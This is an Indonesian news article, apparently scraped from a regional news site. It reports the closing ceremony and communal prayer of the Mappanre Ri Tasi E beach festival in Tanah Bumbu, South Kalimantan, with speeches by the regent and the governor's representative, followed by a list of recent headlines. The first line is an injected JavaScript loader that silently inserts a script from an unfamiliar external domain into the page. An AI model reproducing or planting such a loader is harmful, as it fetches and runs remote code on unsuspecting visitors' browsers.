(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Tanah Bumbu

Puncak Pesta Pantai Tanah Bumbu Ditutup dengan Doa Bersama


KANALKALIMANTAN.COM, BATULICIN – Event Budaya Pesta Pantai Mappanre Ritasi E di kawasan Pantai Pagatan, Kecamatan Kusan Hilir, Kabupaten Tanah Bumbu telah mencapai puncaknya, Minggu (22/5/2022).

Pesta Adat Budaya Maritim yang kembali diadakan setelah dua tahun vakum ini membawa sejumlah perubahan. Kegiatan yang sebelumnya dinamakan Mappanretasi (memberi makan laut) ini diubah penyebutannya menjadi Mappanre Ri Tasi E (syukuran makan bersama di laut).

Namun tidak hanya dari nama event budaya tersebut yang berubah tetapi juga dengan pelaksanaannya, dimana tidak ada lagi budaya masyarakat didalamnya yang mengandung unsur-unsur syirik.

“Alhamdulillah di tahun ini tidak ada lagi pesta laut yang mengandung nilai syirik, nilai yang tidak mendekatkan kita kepada jalan Allah, sudah tidak ada lagi,” kata Bupati Tanah Bumbu HM Zairullah Azhar dalam sambutannya menutup Pesta Budaya ini.

 

Baca juga  : Warnai Puncak Mappanre Ri Tasi E, Parade Kapal Hiasi Laut Pagatan

Menurutnya hal tersebut menjadi sebuah keputusan yang dahsyat, untuk mempertahankan warisan nenek moyang terdahulu dengan tetap menyesuaikan dengan keyakinan serta petunjuk dari para guru, ulama, serta tokoh agama.

Oleh sebab itu Bupati juga menyampaikan ucapan terima kasih kepada Lembaga Ade Ogi selaku panitia penyelenggara yang telah menggandeng berbagai suku yang ada di Kabupaten Tanah Bumbu dan menegaskan bahwa Mappanre Ritasi E ini adalah milik seluruh masyarakat Bumi Bersujud.

“Ini adalah milik kita semua, bukan miliki satu orang, satu golongan atau siapa-siapa. Untuk itu kami mohon doa kita semua berjuang untuk terus membangun kehidupan yang baik di Tanah Bumbu ini,” pungkas Zairullah.

Sementara itu Gubernur Kalimantan Selatan H. Sahbirin Noor melalui Staf Ahli Bidang Ekonomi dan Pembangunan Provinsi Kalimantan Selatan, H. Suparno menyampaikan bahwa Pemerintah Provinsi Kalimantan Selatan memberikan apresiasi terhadap Bupati beserta jajarannya sehingga Event Budaya Maritim ini dapat kembali terlaksana.

 

Baca juga  : Pelaku Curanmor di Jl Kurnia Dibekuk Macan Barbar di Jawa Timur

Gubernur menyebutkan bahwa Kalsel yang terdiri dari macam suku memiliki keunikan tersendiri dan Mappanre Ritasi E ini menjadi salah satu bukti bahwa Kalsel adalah daerah yang terbuka dengan berbagai beragam event masyarakat.

Di tengah kondisi pandemi yang mulai melandai, event ini diharapkan membangkitkan promosi potensi daerah dan dapat mendongkrak kunjungan wisatawan ke Kalsel baik dari omestik maupun mancanegara.

“Semoga dengan event ini akan saling mempererat rasa persaudaraan antara Suku Bugis dengan suku-suku lainnya khusunya di Kabupaten Tanah Bumbu,” harap Gubernur.

Usai melaksanakan penutupan di panggung utama Pantai Pagatan, Bupati bersama rombongan kemudian menaiki kapal untuk selanjutnya memanjatkan doa dan makan bersama di Laut Pagatan.

 

Baca juga  : PENTING. Kini Beri Nama Anak Tak Boleh Cuma 1 Kata dan Maksimal 60 Huruf!

Selain itu melalui puncak event ini juga digelar sajian Kuliner Etnis yang menyajikan masakan tradisional dari berbagai suku yang di Kabupaten Tanah Bumbu.

Turut berhadir dalam kegiatan ini Bupati Tanah Bumbu HM Zairullah Azhar, Dandim 1022/Tanah Bumbu Letkol Rahmat Trianto, Sekretaris Daerah H. Ambo Sakka, beserta Forkopimda, Lembaga Ade Ogi, Ketua MUI, tokoh agama, tokoh masyarakat, serta tamu undangan. (kanalkalimantan.com/ftr)

Reporter : ftr
Editor : cell


Desy Arfianty

Recent Posts

Camat Lurah Boleh Jabat Sekretariat PPK PPS

KANALKALIMANTAN.COM, BANJARBARU - Camat dan Lurah diperbolehkan menjabat sebagai Sekretariat Panitia Pemungutan Kecamatan (PPK) maupun… Read More

8 jam ago

Sekretaris Nasdem Kalsel Melamar Golkar, Rozanie Sadar Cukup Posisi Calon Wagub

KANALKALIMANTAN.COM, BANJARMASIN - Pemilihan Kepala Daerah (Pilkada) serentak 2024, sejumlah tokoh mulai mencari dukungan partai… Read More

8 jam ago

Mesin Terbakar di Udara, Pesawat Jemaah Haji Kloter 5 Embarkasi Makassar Kembali Mendarat

KANALKALIMANTAN.COM, MAKASSAR - Momen mencekam mewarnai penerbangan 450 jemaah haji asal Sulawesi Selatan (Sulsel) terjadi,… Read More

9 jam ago

Meteran Air Leding PAM Bandarmasih Hilang, Biaya Pergantian Ditanggung Pelanggan

KANALAKALIMANTAN.COM, BANJARMASIN - Pelanggan air bersih Perusahan Air Minum (PAM) Bandarmasih Kota Banjarmasin Provinsi Kalimantan… Read More

9 jam ago

Layanan Posyandu Terintegrasi di Desa Manusup

KANALKALIMANTAN.COM, KUALA KAPUAS – Upaya memberikan pelayanan kesehatan dasar kepada masyarakat terus dilakukan Pos Pelayanan… Read More

9 jam ago

Kampung KB Guntung Manggis Masuk Enam Besar Nasional

KANALKALIMANTAN.COM, BANJARBARU - Dukungan segenap unsur pemerintahan mengantarkan Kampung Keluarga Berkualitas (KB) Kelurahan Guntung Manggis… Read More

10 jam ago

This website uses cookies.